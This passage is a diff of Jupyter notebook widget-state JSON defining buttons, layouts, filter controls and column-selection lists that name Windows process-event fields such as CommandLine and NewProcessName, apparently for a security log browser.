+     "101d71758b3643e8bb9816ed822c0cb5": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "⇽ Remove All",
+       "layout": "IPY_MODEL_0aae3189ccb6445b88597d671659fe81",
+       "style": "IPY_MODEL_9ac351b5363b475496c518e770afbce3"
+      }
+     },
+     "1032768376944459aa3e6c70a39123b6": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "10d96dd974f54d1a8e5a94cb9c03872e": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_74fa9c71b0ec481a922dc864621ad54a",
+        "IPY_MODEL_883e0693211d44a7ad0cce63566515de",
+        "IPY_MODEL_e9a364d8356242eaa460bfc61f58ce75",
+        "IPY_MODEL_101d71758b3643e8bb9816ed822c0cb5"
+       ],
+       "layout": "IPY_MODEL_67c2936988ff41e08c935ba701768ea6"
+      }
+     },
+     "1109323aa29e47dbac0b7a6a6d5beebe": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_4c01a47b27504cea84eef56487622669",
+        "IPY_MODEL_429fedb43a7b4c478379bd3a66cb4e5a"
+       ],
+       "layout": "IPY_MODEL_e51b0aa5262c45bc9f1f3a6e3313d219"
+      }
+     },
+     "112807c16f29483db116dcc6531c553a": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "11bad756849940df861619ee57f54ae8": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "123640ba0cea4f9da968315244f625be": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "12c5358443bc48ce898a4ea5e2ef6ce6": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "500px"
+      }
+     },
+     "132d4edf36b448dda4431b86ba240ba0": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "500px"
+      }
+     },
+     "149e2438969e45ffb316dc970456d1fb": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_0d905ec2606940e787eca46cade1ab9d",
+        "IPY_MODEL_9d64ba523a704ed49b41651fde3f2148"
+       ],
+       "layout": "IPY_MODEL_c637944b7f694ee3a2339c345f1fd0d2"
+      }
+     },
+     "14a80d2034dc455a86e1897441d0ea8b": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "LabelModel",
+      "state": {
+       "layout": "IPY_MODEL_e847652e2c8a45cab0ad278a6c880a08",
+       "style": "IPY_MODEL_6c1f75ab44ac489a9fc4fdc265de7c60",
+       "value": " in "
+      }
+     },
+     "14bdab08f5eb4ebf8d9ea4402abda2c2": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "15262870d1d84a4c9b31e8807e84e02e": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "15b94024ea40418dbaa8c53373332424": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "200px"
+      }
+     },
+     "160638c038d04834a03e8cc1e8e788a4": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "100px"
+      }
+     },
+     "169037276db6452cb2ef539bbfcd13cd": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "16d5d38a9798409d823cbb317fbe14e9": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "16f06a96b3b84861bc8fcdc521a9a9fc": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "17233af7114e4bbfad0a662e1f42a1d3": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "70%"
+      }
+     },
+     "1754cc6735a642c99c80ea50b3f23387": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "18cced5f4a4e4e8c8be1b41f2dacef1c": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "400px"
+      }
+     },
+     "196f6de2919a488d885de432efd68bff": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "LabelModel",
+      "state": {
+       "layout": "IPY_MODEL_88d5c49ce3144a1d90912d1b4e0e8f35",
+       "style": "IPY_MODEL_8152896ed99a4cc6b948ea9e1cf1d5b1",
+       "value": "Enter multiple values separated by commas. Strings do not need quotes."
+      }
+     },
+     "1989835689bb409f965c7a52b25af959": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_de973b84536943298f7fe5800bc3a62c",
+        "IPY_MODEL_77aeec9a3f0b4bf99eefad77b1f68dec"
+       ],
+       "layout": "IPY_MODEL_9b49bd4fde5f4b15a5b42e1b3c69f462"
+      }
+     },
+     "199b9d5bf65c4041ab9d98dc20746b07": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "1a44a4cf9c8b4dc382a8d021466c0d18": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "1d0daf94ee134e1b903ad364e730b934": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Add filter",
+       "layout": "IPY_MODEL_b20c9970a8e948678ca47947e7aaf675",
+       "style": "IPY_MODEL_37df403e4e3e4e1a80281eff814ee2ea"
+      }
+     },
+     "1d25bec5fe57403d9fc4f20d2ff333d3": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "1de3a3299e984809933af7b33deca16d": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "1df078ffdbf340d2b70640a33b365c62": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "100px"
+      }
+     },
+     "1ed4e7117a7a46439348eef4ba7f228b": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "1f53b3b0af94423f8d1e6e651d13a739": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_6b033d15e10549ca90024f3f548d9c90",
+        "IPY_MODEL_a2111a9ba8b346f9a740669cf247d8e2",
+        "IPY_MODEL_149e2438969e45ffb316dc970456d1fb",
+        "IPY_MODEL_924757853d714e4d9379bf5ea0401e62"
+       ],
+       "layout": "IPY_MODEL_0967ee4b00824fb984366a39c0c73f13"
+      }
+     },
+     "202bb3e71e2f4283a216400f17f82edc": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "SelectModel",
+      "state": {
+       "description": "Filters",
+       "index": null,
+       "layout": "IPY_MODEL_12c5358443bc48ce898a4ea5e2ef6ce6",
+       "style": "IPY_MODEL_de89b5b8886a4db3837487d3aa14dd24"
+      }
+     },
+     "2045bb0b47b740679b00453bbb43fe43": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_3ee645fa3a97487e8ce033b176c49dfd",
+        "IPY_MODEL_825dae91b7d944c18fed6802e8b4d2d8",
+        "IPY_MODEL_69b8bf72d11e4859b7a35c099b850558",
+        "IPY_MODEL_da88bfbd6a1041e18d934e1b94c84e28"
+       ],
+       "layout": "IPY_MODEL_a479941a224240568cf7ab9faac9bcaa"
+      }
+     },
+     "20dbae8cc26a401b99329ae9f19bfbef": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Delete filter",
+       "layout": "IPY_MODEL_6a2925f0bd3e47dfb77c59fc9daf38e1",
+       "style": "IPY_MODEL_5ecf764ff60340b793e302414cd0a417"
+      }
+     },
+     "2226ad09a3aa41d88d09d86d778a4e33": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "description": "Filter:",
+       "layout": "IPY_MODEL_b06563bf165b41d3ad44fd83ca53cb6a",
+       "style": "IPY_MODEL_c1e8284393ce49e1b68064a05e0821ec"
+      }
+     },
+     "2356f1cfb7f14639aa485a76c074a82b": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "239c5c522a0c491f8ec97c7b46a3ca73": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "23a39ea52cdd48278e671f3d57a160cc": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "23b18ed0935441fbad438828933dccc2": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "2400b101ec914497b73951fbe1c94fad": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "400px"
+      }
+     },
+     "240c8efe2304410fbf00fab36dacaa92": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "24abd3bcd0b943878646456c006f379e": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "24cd9a81835f496aa7097b6502a8818c": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "24f0b291afc94f2d9c1d7ad7e99aa4f0": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "60px"
+      }
+     },
+     "25b1e0fc10ca44b2ac75941c3c5f90f4": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "LabelModel",
+      "state": {
+       "layout": "IPY_MODEL_7af569788ca7405883d02f1967fa0ecd",
+       "style": "IPY_MODEL_d4533ae3647e4d098cc51eb6a2127db3",
+       "value": "Enter multiple values separated by commas. Strings do not need quotes."
+      }
+     },
+     "263cb71d2dab4c549c1f7cfd0e1ab996": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "200px"
+      }
+     },
+     "28d31e801c624bac96c38ebdc8bde877": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "28e2f8aecc1a42f6b2be8c80e32b5450": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "290bdd1228a745eea5f8cef44549b607": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "29818462d318453e942833765601e387": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "⇽ Remove All",
+       "layout": "IPY_MODEL_8d41729e1a0044b5bdfd0914a98a1665",
+       "style": "IPY_MODEL_9a8a82586b6e41ab87cce717b8330065"
+      }
+     },
+     "29c61bd1b3764cac8949a397cc11ca0c": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_2f128316da7d4133b7614ae37b14a71c",
+        "IPY_MODEL_de5a721dfab24746bca9695edc80f9af",
+        "IPY_MODEL_c66f8bee2513480cb6bbf9ccd65813fa",
+        "IPY_MODEL_f42540ef834c46588330bc919ebe7a37"
+       ],
+       "layout": "IPY_MODEL_ede5f65334bb4b3f8c03c55d590663ee"
+      }
+     },
+     "2b69ea13a55049a98b892d9cb690ba48": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "2b8f523976c5435097fc758367a29155": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "2e774ca4b671491f8b2c6815725d2197": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "⇽ Remove",
+       "layout": "IPY_MODEL_765363db870c4e5fbc4aee6d8fa11a6e",
+       "style": "IPY_MODEL_e764c684b29b4baeae8f3d7e4070d57c"
+      }
+     },
+     "2e7cce877ce84b2d952c845e924acf80": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "2e8cf80eb31f4d838fb45ff75ceadd24": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "2ef88d07a68f4b78a1370c09b9f17cc3": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "height": "150px",
+       "width": "300px"
+      }
+     },
+     "2f128316da7d4133b7614ae37b14a71c": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Add All ⇾",
+       "layout": "IPY_MODEL_efb5f03aa620490a90d8ff5f537efb4c",
+       "style": "IPY_MODEL_456a0f75c7a343dfb82324e2656349e5"
+      }
+     },
+     "315902317a0547f9a8f19c4355197016": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "317f3cbab9a04ec4ba020f7d842c08ff": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "32112c3fe01b47168c8748f434d3839a": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_f06eec399f3c4636bd958d097dec7c31",
+        "IPY_MODEL_ccde816cc3e24430892cc22423a2cc8c",
+        "IPY_MODEL_f410bb9feac74bff8c2576f2affec5bd",
+        "IPY_MODEL_b9418b0a4b0f426e82d48c6d431c4b76"
+       ],
+       "layout": "IPY_MODEL_c59f4b4b12ea405aaf0f455b95dcb4b2"
+      }
+     },
+     "32da2808f3dc48c780007097651ad199": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "3421dbe76372482c9fbad5f3bba4582a": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "3461b05d836b4737ac297ec975c7b068": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "500px"
+      }
+     },
+     "357904b77e634085ab873b108cec56e5": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "3599f0195f74406a9eefc7ea701c5a53": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "35e743cbf37540cf82454eff5130d346": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "35ed7a6a2aae4f8bb322a916730e04d5": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "200px"
+      }
+     },
+     "364c943a19604eeb9007ab0305a686c6": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "SelectMultipleModel",
+      "state": {
+       "_options_labels": [
+        "Account",
+        "CommandLine",
+        "Computer",
+        "EventID",
+        "NewProcessId",
+        "NewProcessName",
+        "ParentProcessName",
+        "ProcessId",
+        "SourceComputerId",
+        "SubjectDomainName",
+        "SubjectLogonId",
+        "SubjectUserName",
+        "SubjectUserSid",
+        "TargetLogonId",
+        "TenantId",
+        "TimeCreatedUtc",
+        "TimeGenerated",
+        "TokenElevationType"
+       ],
+       "description": "Selected: ",
+       "index": [],
+       "layout": "IPY_MODEL_6ff46ca9038444fb8984abd8082103fc",
+       "rows": 5,
+       "style": "IPY_MODEL_d769aff3aca54cf0b7e3fe900f6b59cf"
+      }
+     },
+     "36f954cd65c84630a947477c44dd2441": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "371e0543d3a34af78f8beb98169e5866": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "37423026a07c47bcab9fb40a998ce6e3": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "⇽ Remove",
+       "layout": "IPY_MODEL_dbb9c0a587ba49d0966f793675444e26",
+       "style": "IPY_MODEL_ffeb4d532469440bb9baa845061a1bf3"
+      }
+     },
+     "379a69de1e8c403a9b4245e01a504291": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "37df403e4e3e4e1a80281eff814ee2ea": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "3828cc1ef0af4a358e7206ac8d36c8d2": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "description": "Filter:",
+       "layout": "IPY_MODEL_cd7d521ef00c486795f5682f8bdf3551",
+       "style": "IPY_MODEL_44bc20dec7a1474e9da56165c583efbb"
+      }
+     },
+     "388666284cd2420d82603b3470fb3569": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Delete filter",
+       "layout": "IPY_MODEL_7faa7b2636ff49c081e8d4ceb6f0d5dc",
+       "style": "IPY_MODEL_f859b4a334e14303ab3708553ba044e4"
+      }
+     },
+     "3b625d23c1724ba9ad2fca444ae41557": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "3c8fd11bf6eb47bf935f8ad83ef84793": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "60px"
+      }
+     },
+     "3d5cd18b3c704bd5af5b7d7e5fe8c8ef": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_4b4b72cbe9e94236b36123fff4742102",
+        "IPY_MODEL_b098189c53c8460e9a9666d5752d92ef",
+        "IPY_MODEL_1989835689bb409f965c7a52b25af959",
+        "IPY_MODEL_e4ee07ff3b964c7d8f29b74b985769dc"
+       ],
+       "layout": "IPY_MODEL_a1ed7400c5e44de38efb3d26c89a560f"
+      }
+     },
+     "3e555b4d06c54103a7494ee78d1890f3": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "3e5bf9dfbc5e403fbc1f598a84461202": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "SelectModel",
+      "state": {
+       "description": "Filters",
+       "index": null,
+       "layout": "IPY_MODEL_132d4edf36b448dda4431b86ba240ba0",
+       "style": "IPY_MODEL_56a988762bca49b1a916067527dc99c7"
+      }
+     },
+     "3ee645fa3a97487e8ce033b176c49dfd": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DropdownModel",
+      "state": {
+       "_options_labels": [
+        "TenantId",
+        "Account",
+        "EventID",
+        "TimeGenerated",
+        "Computer",
+        "SubjectUserSid",
+        "SubjectUserName",
+        "SubjectDomainName",
+        "SubjectLogonId",
+        "NewProcessId",
+        "NewProcessName",
+        "TokenElevationType",
+        "ProcessId",
+        "CommandLine",
+        "ParentProcessName",
+        "TargetLogonId",
+        "SourceComputerId",
+        "TimeCreatedUtc"
+       ],
+       "index": 0,
+       "layout": "IPY_MODEL_15b94024ea40418dbaa8c53373332424",
+       "style": "IPY_MODEL_9d5c7d739a3a469a85328effd2798798"
+      }
+     },
+     "3fac7055e539457aae88db9d1b336a88": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "40a1ef478e2940c9ac816f6fe9a930bb": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "41a49335edb540afb5788bafc4b12ee8": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Update filter",
+       "layout": "IPY_MODEL_8f774e952712457980e7629729a12dd6",
+       "style": "IPY_MODEL_dff0190e115d4b2785e7a5fd7b074d8d"
+      }
+     },
+     "41e832972ce94fd6b272cbcd2e381a24": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "4240f695acbc496489d98ddef8c4b4fa": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "4290b96dad854b4e8ef4d3ef551ebd05": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "429fedb43a7b4c478379bd3a66cb4e5a": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_fc40d426613c4c298b80596e4b386a8b",
+        "IPY_MODEL_aa538012bac8400d9af8fc9139f334e8",
+        "IPY_MODEL_364c943a19604eeb9007ab0305a686c6"
+       ],
+       "layout": "IPY_MODEL_cf5e4274010541d8865bc05ddf91e0d2"
+      }
+     },
+     "44bc20dec7a1474e9da56165c583efbb": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "initial"
+      }
+     },
+     "455a4f5afc00481cbda4e6749f52df45": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "⇽ Remove All",
+       "layout": "IPY_MODEL_791184a6b4e94f2897f8d7fa4f84d4a9",
+       "style": "IPY_MODEL_371e0543d3a34af78f8beb98169e5866"
+      }
+     },
+     "456a0f75c7a343dfb82324e2656349e5": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "4640975482294d48a0062172a50ad4fe": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "60px"
+      }
+     },
+     "4720a484b76c4164b5d14b596ac913a8": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "4732461066364353bdec58f67246ac2b": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Add filter",
+       "layout": "IPY_MODEL_5f3944eaf26044c5bfcb4c62815bf242",
+       "style": "IPY_MODEL_3e555b4d06c54103a7494ee78d1890f3"
+      }
+     },
+     "48d9e12f7bf74adaa36be69badc166bc": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "LabelModel",
+      "state": {
+       "layout": "IPY_MODEL_36f954cd65c84630a947477c44dd2441",
+       "style": "IPY_MODEL_531d46fde7f2414b8ed730e187bdf947",
+       "value": " in "
+      }
+     },
+     "492e6b74c6fb4883ac8e7f217427b0f2": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "CheckboxModel",
+      "state": {
+       "description": "not",
+       "disabled": false,
+       "layout": "IPY_MODEL_4640975482294d48a0062172a50ad4fe",
+       "style": "IPY_MODEL_0468790673594a8daa18a9805bf3db84",
+       "value": false
+      }
+     },
+     "49926b14baa846ed9ec26bffa8f01557": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "49ec7cbca6094ec6bd95b9d8fc475e19": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Apply columns",
+       "layout": "IPY_MODEL_0ff353fb41fd4ed58826f9effa2b5a18",
+       "style": "IPY_MODEL_99c0dafd7b9d497bb9f1fd7395417065"
+      }
+     },
+     "4adbd494324149ee87c67f74fb08c17a": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "4b4b72cbe9e94236b36123fff4742102": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_0b50cc97034944ca87ec5c6d415ad132",
+        "IPY_MODEL_051ad9f6b3e941e996df3e4b7dd5a3c3"
+       ],
+       "layout": "IPY_MODEL_9f7ea662245444379365dcd2ba059448"
+      }
+     },
+     "4b4df991eb764acba40c4005635698cc": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "4b5cb16646744994a0591fd8c712a95c": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "SelectMultipleModel",
+      "state": {
+       "_options_labels": [
+        "Account",
+        "CommandLine",
+        "Computer",
+        "EventID",
+        "NewProcessId",
+        "NewProcessName",
+        "ParentProcessName",
+        "ProcessId",
+        "SourceComputerId",
+        "SubjectDomainName",
+        "SubjectLogonId",
+        "SubjectUserName",
+        "SubjectUserSid",
+        "TargetLogonId",
+        "TenantId",
+        "TimeCreatedUtc",
+        "TimeGenerated",
+        "TokenElevationType"
+       ],
+       "description": "Source: ",
+       "index": [],
+       "layout": "IPY_MODEL_e66cc5687c9b491c82606ce504ad107c",
+       "rows": 5,
+       "style": "IPY_MODEL_a49ece9f71ee4341876903064f3561ee"
+      }
+     },
+     "4c01a47b27504cea84eef56487622669": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "description": "Filter:",
